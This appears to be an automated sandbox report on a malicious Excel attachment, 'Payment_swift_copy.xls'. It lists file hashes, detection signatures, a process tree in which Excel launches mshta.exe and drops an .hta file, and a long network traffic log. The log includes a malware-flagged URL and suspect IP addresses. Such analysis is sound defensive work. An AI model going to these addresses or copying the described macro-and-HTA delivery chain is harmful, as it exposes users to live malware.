Windows Analysis Report
Payment_swift_copy.xls

Overview

General Information

Sample name: Payment_swift_copy.xls
Analysis ID: 1575764
MD5: 3c31b1b6455e98d02fde97673287f260
SHA1: 10eb67ae8645458996d5eeb3101504ceaf446d85
SHA256: cf7373204fc102aa8f3d4ea5a8ac56db2d6227f0e9610c8089dfca7b3477034a
Tags: xls, user-abuse_ch
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 2696 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 7052 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 1408 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • appidpolicyconverter.exe (PID: 7680 cmdline: "C:\Windows\system32\appidpolicyconverter.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4)
    • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • EXCEL.EXE (PID: 8188 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Payment_swift_copy.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: File created, Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0TF3KEZE\clearentirethingwithbestnoticetheeverythinggooodfrome[1].hta
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 2696, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 7052, ProcessName: mshta.exe
Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton: Data: DestinationIp: 170.82.173.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2696, Protocol: tcp, SourceIp: 192.168.2.25, SourceIsIpv6: false, SourcePort: 49724
Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.25, DestinationIsIpv6: false, DestinationPort: 49724, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2696, Protocol: tcp, SourceIp: 170.82.173.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

AV Detection

Source: https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female, Avira URL Cloud: Label: malware
Source: Payment_swift_copy.xls, ReversingLabs: Detection: 21%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49729 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49747 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\System32\mshta.exe
Source: global traffic, DNS query: name: curt.wiz.co
Source: global traffic, DNS query: name: assets.msn.com
Source: global traffic, TCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global traffic, TCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global traffic, TCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global traffic, TCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
